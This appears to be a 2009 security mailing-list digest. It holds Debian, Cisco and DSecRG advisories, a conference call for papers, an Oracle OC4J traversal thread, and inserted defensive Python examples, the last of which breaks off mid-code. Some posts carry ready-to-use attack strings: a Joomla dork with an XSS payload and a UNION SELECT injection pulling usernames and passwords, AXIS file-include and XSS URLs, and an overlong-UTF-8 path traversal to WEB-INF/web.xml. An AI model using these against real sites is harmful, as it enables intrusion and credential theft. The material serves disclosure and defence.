[SECURITY] [DSA 1693-2] New phppgadmin packages fix regression

2009-01-21 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1693-2  secur...@debian.org
http://www.debian.org/security/  Thijs Kinkhorst
January 21, 2009  http://www.debian.org/security/faq
- 

Package        : phppgadmin
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-2865 CVE-2007-5728 CVE-2008-5587
Debian Bugs    : 427151 449103 508026

The security update for phpPgAdmin in DSA-1693-1 caused a regression in
modifying table fields. This update corrects that flaw. For reference
the original advisory follows.

Several remote vulnerabilities have been discovered in phpPgAdmin, a tool
to administrate PostgreSQL databases over the web. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-2865

    Cross-site scripting vulnerability allows remote attackers to inject
    arbitrary web script or HTML via the server parameter.

CVE-2007-5728

    Cross-site scripting vulnerability allows remote attackers to inject
    arbitrary web script or HTML via PHP_SELF.

CVE-2008-5587

    Directory traversal vulnerability allows remote attackers to read
    arbitrary files via the _language parameter.

For the stable distribution (etch), these problems have been fixed in
version 4.0.1-3.1etch2.

We recommend that you upgrade your phppgadmin package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch2.dsc
Size/MD5 checksum:  890 a20ab5b499af2fa4393a344fd05641bb
  
http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch2.diff.gz
Size/MD5 checksum:    15892 0d10507c0d6abf870c8cb4d29515d928
  
http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1.orig.tar.gz
Size/MD5 checksum:   703673 eedac65ce5d73aca2f92388c9766ba1b

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch2_all.deb
Size/MD5 checksum:   704442 3449706caa8d61016aaf3a9cb9676ffb


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBSXb2JSIIoQCMVaAcAQKIgwgAhedxjMYlT53fsZ7mZvQ5y6ERp8NoKDAW
usnyegZyIK3L9+erVn0Nho+JEjunviajlq4M6y/Mg6sYdEkgnPOAGA8GSzFc+Gaz
mIGgFNdFKyq7hPzadlGv+hjD9M8Mf9ZyKfQCoX6TqKnMqLAQRwxbiCaJni4EbhhN
Vvh4mG1Ki6FVvR+mLMLBFBRLGz/pevLkdunl45gF/u1Uua9O7ZsINvsZCpIp9Azg
DXsxGlJbt8c0qJyJsGKkkoao0aX6NTQVf/0pfdDW3vhUwjuLUisG1QdnGI+KdMoy
gekHF9BLSliLFOq3H0C6EsLkdO2Dm84LnUuqzx7/9EDpxQv82Nu73g==
=kucF
-END PGP SIGNATURE-



[SECURITY] [DSA 1709-1] New shadow packages fix privilege escalation

2009-01-21 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1709-1  secur...@debian.org
http://www.debian.org/security/  Thijs Kinkhorst
January 21, 2009  http://www.debian.org/security/faq
- 

Package        : shadow
Vulnerability  : race condition
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-5394
Debian Bug     : 505271

Paul Szabo discovered that login, the system login tool, did not
correctly handle symlinks while setting up tty permissions. If a local
attacker were able to gain control of the system utmp file, they could
cause login to change the ownership and permissions on arbitrary files,
leading to a root privilege escalation.

For the stable distribution (etch), this problem has been fixed in
version 4.0.18.1-7+etch1.

For the unstable distribution (sid), this problem has been fixed in
version 4.1.1-6.

We recommend that you upgrade your shadow package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1.orig.tar.gz
Size/MD5 checksum:  2354234 3f54eaa3a35e7c559f4def92e9957581
  
http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1-7+etch1.diff.gz
Size/MD5 checksum:   297817 b78d9d738765da65a6b55dea102569c3
  
http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1-7+etch1.dsc
Size/MD5 checksum: 1406 ec01ac54e482ea552fdae5753d6c1745

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_alpha.deb
Size/MD5 checksum:   810680 329e1cd5ad019d3984411b1a8a5c77ad
  
http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_alpha.deb
Size/MD5 checksum:   943992 76690a44c565b4594892bab69eaf7e30

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_amd64.deb
Size/MD5 checksum:   867696 4ce4e2f7884cd883729123163930b9dc
  
http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_amd64.deb
Size/MD5 checksum:   806412 3a6171d83a4b79846fe4831b02007a4b

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_arm.deb
Size/MD5 checksum:   778766 df6126b8cd29de54831976a24d28589e
  
http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_arm.deb
Size/MD5 checksum:   791770 a9e7b122a8f9a7944bfc91b7cec77554

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_hppa.deb
Size/MD5 checksum:   847846 8562b322610062eb31689e467d80ff7c
  
http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_hppa.deb
Size/MD5 checksum:   804082 af4a3f06a93be5cea7dd7dfeed8eed1b

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_i386.deb
Size/MD5 checksum:   792460 82c630b2f4e18217170a73a2dab27cba
  
http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_i386.deb
Size/MD5 checksum:   796578 439cd50477db064cdf11d9b48c0e9af0

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_ia64.deb
Size/MD5 checksum:  1048736 79434b796109c1565f0f0be3cb8d06f0
  
http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_ia64.deb
Size/MD5 checksum:   826456 13df2a0a071f407c84b25ae3ed6077bc

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_mips.deb
Size/MD5 checksum:   804530 0523d4220e9cb7e8b2342a0a33c1e989
  
http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_mips.deb
Size/MD5 checksum:   899612 597b58ea81e074bae374b412f28e1252

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_mipsel.deb
Size/MD5 checksum:   908860 ade3427a1b8b693a098544ac27ae17aa
  
http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_mipsel.deb
Size/MD5 checksum:   805100 fd9d9e49cd9b7864b06865c097f0ba08

powerpc architecture (PowerPC)

  

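The advisory above describes login changing tty ownership and permissions by name, so that a symlink planted at that name redirects the change to an arbitrary file. The following is an added example, not code from the Debian advisory or from the shadow package: it shows the fd-based pattern a hardened login should use (open with O_NOFOLLOW, inspect the object with fstat, then fchmod the descriptor) beside the name-based chmod the advisory warns about. The file names, the "victim" file and the relaxed character-device check in the demo are constructed for this example; ownership changes would use os.fchown in the same way but need root, so only the mode bits are set here.

```python
import errno
import os
import shutil
import stat
import tempfile

# Added example, not code from the Debian advisory or from the shadow
# package: every decision is made on a file descriptor opened without
# following symlinks, so a symlink planted under the tty name cannot
# redirect the permission change to an arbitrary file.


def set_tty_mode_safely(path, mode=0o620, require_chardev=True):
    """Open `path` with O_NOFOLLOW, verify what was opened, then fchmod it.

    Returns the mode now set on the object. Raises OSError(ELOOP) if `path`
    is a symlink and ValueError if it is not a character device.
    """
    flags = os.O_RDWR | os.O_NOFOLLOW | os.O_NOCTTY
    fd = os.open(path, flags)  # fails with ELOOP when `path` is a symlink
    try:
        st = os.fstat(fd)  # inspect the object actually opened, not the name
        if require_chardev and not stat.S_ISCHR(st.st_mode):
            raise ValueError(f"{path} is not a character device")
        os.fchmod(fd, mode)  # acts on the fd; the name could be re-pointed
        return stat.S_IMODE(os.fstat(fd).st_mode)
    finally:
        os.close(fd)


def set_tty_mode_unsafe(path, mode=0o620):
    """The pattern the advisory warns about: chmod by name follows symlinks."""
    os.chmod(path, mode)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Constructed scenario: a regular file stands in for the tty and a
    planted symlink points at a 'victim' file. Returns what each variant did."""
    root = tempfile.mkdtemp(prefix="tty-demo-")
    tty_stand_in = os.path.join(root, "ttyS_stand_in")
    victim = os.path.join(root, "victim")
    for p in (tty_stand_in, victim):
        with open(p, "w"):
            pass
    os.chmod(victim, 0o600)
    planted = os.path.join(root, "planted_link")
    os.symlink(victim, planted)

    result = {}
    # Name-based chmod silently changes the victim's mode through the symlink.
    set_tty_mode_unsafe(planted, 0o666)
    result["victim_mode_after_unsafe"] = stat.S_IMODE(os.stat(victim).st_mode)
    # The fd-based version refuses the symlink outright.
    try:
        set_tty_mode_safely(planted, 0o666, require_chardev=False)
        result["symlink_refused"] = False
    except OSError as exc:
        result["symlink_refused"] = exc.errno == errno.ELOOP
    # It works on the real object (a regular file here, so the
    # character-device check is relaxed for the demo only).
    result["mode_applied"] = set_tty_mode_safely(
        tty_stand_in, 0o620, require_chardev=False)
    shutil.rmtree(root)
    return result


if __name__ == "__main__":
    print(demo())
```

The point of the safe variant is that the check and the change operate on the same kernel object: once the descriptor is open, no later rename or symlink swap at the path can change what gets modified.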
CfP: 16th ACM Conference on Computer and Communications Security (CCS) 2009

2009-01-21 Thread Christopher Kruegel

==
Call for Papers:
16th ACM Conference on Computer and Communications Security (CCS) 2009

Nov 9 - 13, 2009: Hyatt Regency Chicago, IL, USA
http://sigsac.org/ccs/CCS2009
==

Important Dates:

* Paper Submission due: Monday, April 20th, 2009
* Acceptance notification: Sunday, July 12th, 2009
* Final papers due: Monday, August 17th, 2009

==

The annual ACM Computer and Communications Security Conference is a
leading international forum for information security researchers,
practitioners, developers, and users to explore cutting-edge ideas and
results, and to exchange techniques, tools, and experiences.  The
conference seeks submissions from academia, government, and industry
presenting novel research on all practical and theoretical aspects of
computer and communications security, as well as case studies and
implementation experiences. Papers should have relevance to the
construction, evaluation, application, or operation of secure
systems. Theoretical papers must make a convincing argument for the
practical significance of the results. All topic areas related to
computer and communications security are of interest and in scope.
Accepted papers will be published by ACM Press in the conference
proceedings. Outstanding papers will be invited for possible
publication in a special issue of the ACM Transactions on Information
and System Security.

Paper Submission Process:

Submissions must be made by the deadline of April 20, 2009, through
the website:

http://www.easychair.org/conferences/?conf=ccs2009

Submitted papers must not substantially overlap papers that have been
published or that are simultaneously submitted to a journal, conference
or workshop. Simultaneous submission of the same work is not
allowed. Authors of accepted papers must guarantee that their papers
will be presented at the conference.

Paper Format:

Submissions must be at most ten pages in double-column ACM format
(note: pages must be numbered), excluding the bibliography and
well-marked appendices and at most 12 pages overall. All submissions
must be anonymized (an author's name should only occur in references
to that author's related work, which should be referenced in the third
person and not overtly distinguishable from the referenced work of
others). Only PDF or Postscript files will be accepted. Submissions
not meeting these guidelines risk rejection without consideration of
their merits.

Tutorial Submissions:

Proposals for long (3-hour) and short (1.5-hour) tutorials on research
topics of current and emerging interest should be submitted
electronically to the tutorials chair by May 25, 2009. The guidelines
for tutorial proposal can be found on the website.

Conference Website
Additional information and this call for papers can be found at:
http://sigsac.org/ccs/CCS2009

General Chair:
Ehab Al-Shaer (DePaul University, USA)

Program Chairs:
Somesh Jha (University of Wisconsin, USA)
Angelos D. Keromytis (Columbia U & Symantec Research Labs Europe)

Tutorial Chair:
Ninghui Li (Purdue University, USA)

Workshops Chair:
Ting Yu (Purdue University, USA)

Treasurer:
Sencun Zhu (Penn State University, USA)

Publication Chair:
Hao Chen (UC Davis, USA)

Web Chair:
Peng Liu (Penn State University, USA)

Student Travel Grant Chair:
Angelos Stavrou (George Mason U, USA)

Publicity Chairs:
Christopher Kruegel (UC Santa Barbara, USA)
Elena Ferrari (University of Insubria, Italy)

Posters & Demos Co-Chairs:
Nikita Borisov (University of Illinois, USA)
Xinming Ou (Kansas State U, USA)

Patron Co-Chairs:
Peng Ning (North Carolina State U., USA)
Nasir Memon (Polytechnic Inst. of NYU, USA)
Gail-Joon Ahn (Arizona State Univ., USA)

Local Arrangements Committee:
Yan Chen (Northeastern University, USA)
V.N. Venkatakrishnan, (U. of Illinois, USA)
Tricha Anjali (Illinois Inst. of Tech., USA)
Jean-Philippe Labruyere (DePaul U., USA)

Regional Arrangement Committee:
XiaoFeng Wang (Indiana Univ., USA)
Cristina Nita-Rotaru (Purdue Univ., USA)
Alex Liu (Michigan State Univ., USA)
Nikita Borisov (University of Illinois, USA)


Technical Program Committee:

Martin Abadi (UC Santa Cruz & Microsoft, USA)
Kostas Anagnostakis (I2R/A-STAR, Singapore)
Kosta Beznosov (U British Columbia, Canada)
Dan Boneh (Stanford University, USA)
Steve Borbash (Department of Defense, USA)
Jean Camp (Indiana University, USA)
Iliano Cervesato (Carnegie Mellon Univ., USA)
Mihai Christodorescu (IBM Research, USA)
Debra Cook (IDA-CCS, USA)
Lorrie Cranor (Carnegie Mellon Univ., USA)
Weidong Cui (Microsoft Research, USA)
Marc Dacier (Symantec, France)
George Danezis (Microsoft Research, UK)
Claudia Diaz (KU Leuven, Belgium)
Sven Dietrich (Stevens Inst. of Tech., USA)
Wenliang Du (Syracuse University, USA)
Matt Edman (Rensselaer Polytechnic Inst., USA)
Simone Fischer-Huebner (Karlstads U, 

[DSECRG-09-004] AXIS 70U Network Document Server - Privilege Escalation and XSS

2009-01-21 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-004
AXIS 70U Network Document Server - Privilege Escalation and XSS

http://dsecrg.com/pages/vul/show.php?id=60


Application:        AXIS 70U Network Document Server (Web Interface)
Versions Affected:  3.0
Vendor URL:         http://www.axis.com/
Bug:                Local File Include and Privilege Escalation,
                    Multiple Linked XSS
Exploits:           YES
Reported:           20.10.2008
Vendor response:    20.10.2008
Last response:      02.01.2009
Vendor Case ID:     143027
Solution:           NONE
Date of Public Advisory: 19.01.2009
Authors:            Digital Security Research Group [DSecRG]
                    (research [at] dsec [dot] ru)



Description
***

Vulnerabilities found in Web Interface of device AXIS 70U Network Document 
Server.

1. Local File Include and Privilege Escalation.

Standard user can escalate privileges to administrator.

2. Multiple Linked XSS vulnerabilities



Details
***

1. Local File Include and Privilege Escalation.

Local File Include vulnerability found in script user/help/help.shtml

User can include any local files even in admin folder.

Example:

http://[server]/user/help/help.shtml?/admin/this_server/this_server.shtml


2. Multiple Linked XSS vulnerabilities

Linked XSS vulnerability found in scripts:

user/help/help.shtml
user/help/general_help_user.shtml

Attacker can inject XSS script in URL.

Example:

http://[server]/user/help/help.shtml?scriptalert('DSecRG XSS')/script
http://[server]/user/help/general_help_user.shtml?scriptalert('DSecRG 
XSS')/script



Solution


Vendor decided that this vulnerability is not critical and there are no
patches for this firmware. But maybe they will patch the issues in the next
firmware release.


Vendor response:

[13.01.2009]: We don't see any major vulnerability issues with the current 
firmware of Axis 70U but we will consider the mentioned issues on the next 
firmware release.



About
*

Digital Security is a leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.

Contact:research [at] dsec [dot] ru
http://www.dsecrg.com
http://www.dsec.ru
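Both the phpPgAdmin advisory earlier in this digest (CVE-2008-5587, arbitrary file read through the _language parameter) and the AXIS help.shtml issue above are the same defect: a request parameter is used as a file name without being confined to the directory it is meant to select from. The following is an added example, not phpPgAdmin's or Axis's code, showing the check that closes that class of bug. It canonicalises the joined path with realpath() and requires the result to stay under the base directory, with an optional syntax allowlist in front for values like language codes. The directory layout, file names and the planted symlink in the demo are constructed for this example.

```python
import os
import re
import shutil
import tempfile

# Added example, not phpPgAdmin's or Axis's code: confine a user-supplied
# file name (a _language value, a help page argument) to one directory
# before opening it.

LANG_RE = re.compile(r"[a-z]{2,3}(?:[_-][A-Za-z]{2,4})?")  # en, pt_BR, zh-Hant


def confine(base_dir, relative_name):
    """Return the canonical absolute path of `relative_name` inside
    `base_dir`, or raise ValueError if it would land anywhere else.

    realpath() resolves '..', '.', doubled separators and symlinks, so the
    comparison is made on what the OS would actually open. An absolute
    `relative_name` is rejected too: os.path.join discards the base in that
    case and the result then lies outside it."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, relative_name))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"refusing path outside {base}: {candidate}")
    return candidate


def resolve_language_file(base_dir, lang):
    """Allowlist the syntax of the value first (defence in depth), then
    confine the resulting file name."""
    if not LANG_RE.fullmatch(lang):
        raise ValueError(f"rejected language value: {lang!r}")
    return confine(base_dir, lang + ".lang")


def demo():
    """Build a throw-away tree: <root>/user/help (the allowed base),
    <root>/admin (must stay unreachable) and a symlink planted inside the
    base that points at admin. Returns 'allowed' or 'rejected' per input."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    base = os.path.join(root, "user", "help")
    os.makedirs(base)
    os.makedirs(os.path.join(root, "admin"))
    with open(os.path.join(base, "general_help_user.shtml"), "w") as f:
        f.write("constructed help page\n")
    os.symlink(os.path.join(root, "admin"), os.path.join(base, "planted"))

    cases = {
        "plain": (confine, "general_help_user.shtml"),
        "dot_segments": (confine, "./sub/../general_help_user.shtml"),
        "dotdot": (confine, "../../admin/this_server/this_server.shtml"),
        "absolute": (confine, "/admin/this_server/this_server.shtml"),
        "planted_symlink": (confine, "planted/this_server.shtml"),
        "lang_ok": (resolve_language_file, "pt_BR"),
        "lang_traversal": (resolve_language_file, "../../etc/passwd"),
    }
    verdicts = {}
    for name, (fn, arg) in cases.items():
        try:
            fn(base, arg)
            verdicts[name] = "allowed"
        except ValueError:
            verdicts[name] = "rejected"
    shutil.rmtree(root)
    return verdicts


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:16s} {verdict}")
```

The symlink case is why the comparison is done after realpath() rather than on the normalised string: a name that looks harmless inside the base can still resolve to the admin tree.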





Cisco Security Advisory: Cisco Security Manager Vulnerability

2009-01-21 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco Security Manager Vulnerability

Advisory ID: cisco-sa-20090121-csm

http://www.cisco.com/warp/public/707/cisco-sa-20090121-csm.shtml

Revision 1.0

For Public Release 2009 January 21 1600 UTC (GMT)

- -

Summary
===

Cisco Security Manager contains a vulnerability when it is used with
Cisco IPS Event Viewer (IEV) that results in open TCP ports on both
the Cisco Security Manager server and IEV client. An unauthenticated,
remote attacker could leverage this vulnerability to access the MySQL
databases or IEV server.

Cisco has released free software updates that address this
vulnerability. A workaround is also available to mitigate this
vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20090121-csm.shtml

Affected Products
=

Vulnerable Products
+--

All 3.1 and 3.2 versions prior to 3.2.2 of Cisco Security Manager are
affected by this vulnerability. Cisco IEV is installed with Cisco
Security Manager by default, but the vulnerability is not exposed
until IEV has been launched.

Products Confirmed Not Vulnerable
+

The following products have been confirmed not vulnerable:

  * Cisco Security Manager 3.2.2
  * Cisco Security Manager 3.0.x and earlier
  * Standalone implementations of Cisco IEV
  * Cisco IPS Manager Express

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

Cisco Security Manager is an enterprise-class management application
that is designed to configure firewall, VPN, and intrusion prevention
security services on Cisco network and security devices. As part of
Cisco Security Manager installation, the Cisco IEV is installed by
default. The IEV is a Java-based application that allows users to
view and manage alerts for up to five sensors, including the ability
to report top alerts, attackers, and victims over a specified number
of hours or days. Users can connect to and view alerts in real time
or via imported log files, configure filters and views to help manage
alerts, and import and export event data for further analysis.

A vulnerability exists in the Cisco Security Manager server. When the
IEV is launched, it opens several remotely available TCP ports on the
Cisco Security Manager server and client. These ports could allow
remote, unauthenticated root access to the IEV database and server.
When IEV is closed, it closes open ports on the Cisco Security
Manager client that launched the IEV but fails to close open ports on
the server. If the IEV has never been used on the system, the Cisco
Security Manager server is not vulnerable.

The IEV database contains events that are collected from Cisco
Intrusion Prevention System (IPS) devices. The IEV server allows an
unauthenticated user to add, delete, or modify the devices that are
added into the IEV.

This vulnerability is documented in Cisco Bug ID: CSCsv66897 

This vulnerability has been assigned the Common Vulnerabilities and
Exposures (CVE) identifier CVE-2008-3820.

Vulnerability Scoring Details
=

Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss 

CSCsv66897: Cisco Security Manager/IEV: TCP Ports open for remote 
connection without any authentication

CVSS Base Score - 8.8

 Access Vector   - Network
 Access Complexity   - Medium
 Authentication  - None
 Confidentiality Impact  - Complete
 Integrity Impact- Complete
 Availability Impact - None

CVSS Temporal Score - 7.3

 Exploitability  - Functional
 Remediation Level   - Official-Fix
 Report Confidence   - Confirmed

Impact
==

Successful exploitation of this vulnerability may result in remote
root access to the IEV database or to the IEV Server. Upon launching
the IEV remotely accessible ports are opened on the Cisco Security
Manager server and the client where the IEV is launched. When the IEV
application is closed these ports are subsequently closed on the
client however remain open on the Cisco Security Manager server

Cisco Security Advisory: Cisco Unified Communications Manager CAPF Denial of Service Vulnerability

2009-01-21 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco Unified Communications Manager CAPF
 Denial of Service Vulnerability

Advisory ID: cisco-sa-20090121-cucmcapf

Revision 1.0

For Public Release 2009 January 21 1600 UTC (GMT)

+-

Summary
===

Cisco Unified Communications Manager, formerly Cisco CallManager,
contains a denial of service (DoS) vulnerability in the Certificate
Authority Proxy Function (CAPF) service. Exploitation of this
vulnerability could cause an interruption in voice services. The CAPF
service is disabled by default.

Cisco has released free software updates that address this
vulnerability. Workarounds that mitigate this vulnerability are
available.

This advisory is posted at:

http://www.cisco.com/warp/public/707/cisco-sa-20090121-cucmcapf.shtml

Affected Products
=

Vulnerable Products
+--

These products are vulnerable:

  * Cisco Unified Communications Manager 5.x versions prior to 5.1(3e)
  * Cisco Unified Communications Manager 6.x versions prior to 6.1(3)

Administrators of systems that are running Cisco Unified
Communications Manager versions 5.x and 6.x can determine the
software version by viewing the main page of the Cisco Unified
Communications Manager Administration interface. The software version
can also be determined by running the command show version active by
way of the command line interface (CLI).

Products Confirmed Not Vulnerable
+

Cisco Unified Communications Manager version 4.x and Cisco Unified
Communications Manager Express are not affected by this
vulnerability. No other Cisco products are currently known to be
affected by this vulnerability.

Note: Cisco Unified Communications Manager 7.0(1) shipped with the
software fix for this vulnerability and is not affected.

Details
===

The CAPF service of Cisco Unified Communications Manager versions 5.x
and 6.x contains a vulnerability when handling malformed input that
may result in a DoS condition. The CAPF service is disabled by
default; however, if it is enabled, the CAPF service listens by
default on TCP port 3804 and the listening port is configurable by
the user. There is a workaround for this vulnerability. This
vulnerability is fixed in Cisco Unified Communications Manager
versions 5.1(3e) and 6.1(3). This vulnerability is documented in
Cisco Bug ID CSCsq32032 and has been assigned Common Vulnerabilities
and Exposures (CVE) identifier CVE-2009-0057.

Vulnerability Scoring Details
=

Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

CSCsq32032 - CAPF DoS when client terminates prematurely

CVSS Base Score - 7.8

Access Vector   - Network
Access Complexity   - Low
Authentication  - None
Confidentiality Impact  - None
Integrity Impact- None
Availability Impact - Complete

CVSS Temporal Score - 6.4

Exploitability  - Functional
Remediation Level   - Official-Fix
Report Confidence   - Confirmed

Impact
==

Successful exploitation of the vulnerability described in this
advisory may result in the interruption of voice services.

Software Versions and Fixes
===

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Cisco Unified Communications Manager version 5.1(3e) contains the fix
for this vulnerability and can be downloaded here:

http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=nullisPlatform=Ymdfid=280735907sftType=Unified%20Communications%20Manager%20UpdatestreeName=Voice%20and%20Unified%20CommunicationsmodelName=Cisco%20Unified

Joomla component beamospetition 1.0.12 Sql Injection

2009-01-21 Thread vds_s
Joomla component beamospetition 1.0.12 Sql Injection / Xss

Author : vds_s

Dork : Powered by beamospetition 1.0.12

Dl : http://joomlacode.org/gf/project/beamospetition/

Xss : 
http://[site]/?option=com_beamospetitionfunc=signpet='scriptalert('Xss')/script

Sql Injection : 
http://[site]/?option=com_beamospetitionfunc=signmpid=-'%20union%20select%200,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/*
 


Re: [Full-disclosure] Oracle Containers For Java Directory Traversal (OC4J) Oracle Application Server 10g (10.1.3.1.0) Oracle HTTP Server

2009-01-21 Thread Mark Thomas
Eduardo Vela wrote:
 Probably one of these are the vulnerability descriptions of the bugs:
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5460
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4017

Looks to be an exact match with
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938

Note that although initially reported as a Tomcat vulnerability, the root cause
is a JVM bug.

Mark


 
 If it's the same issue, Oracle didn't contact me to notify me about it..
 if it is that bug, then it could be fixed via:
 https://support.bea.com/application_content/product_portlets/securityadvisories/2810.html
 
 or in that case
 
 http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
 
 Greetings!!
 
 -- Eduardo
 http://www.sirdarckcat.net/
 
 
 On Mon, Jan 19, 2009 at 10:56 PM, Eduardo Vela sirdarck...@gmail.com wrote:
 
 Server Version Info: Oracle-Application-Server-10g/10.1.3.1.0
 Oracle-HTTP-Server
 PoC: http://OC4J/web-app/foobar/%c0%ae%c0%ae/WEB-INF/web.xml
 Related: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
 Explanation: The %c0%ae%c0%ae is interpreted as: .. because on
 Java's side: %c0%ae is interpreted as: \uC0AE that gets cast to
 an ASCII-LOW char, that is: ..

 You can read dangerous configuration information including passwords,
 users, paths, etc..
 Discovered: 8/16/08
 Vendor contacted: 8/16/08
 Vendor response: 8/18/08
 Vendor reproduced the issue: 9/10/08
 Vendor last contact: 9/30/08
 Public Disclosure: 1/19/09

 Oracle security bug id: 7391479

 For more information contact Oracle Security Team: secalert...@oracle.com

 I really wanted to give a link to a patch, but I think it's better if
 this is known by sysadmins so they can filter this using an IDS.

 Greetings!!

 -- Eduardo
 http://www.sirdarckcat.net/

 
 
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
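The PoC in the thread above relies on a decoder that accepts C0 AE, an overlong two-byte encoding of the single byte 2E ('.'), which a strict UTF-8 decoder must reject. The following is an added example, not Oracle's, Tomcat's or any JVM's code: a deliberately lenient two-byte decoder (constructed to model the behaviour the thread describes) shows why the sequence turns into '..', and a strict decode plus a parent-segment check, run over a few constructed access-log lines, shows the filtering the original poster suggests sysadmins apply. The log lines and addresses are made up for this example.

```python
import re
from urllib.parse import unquote_to_bytes

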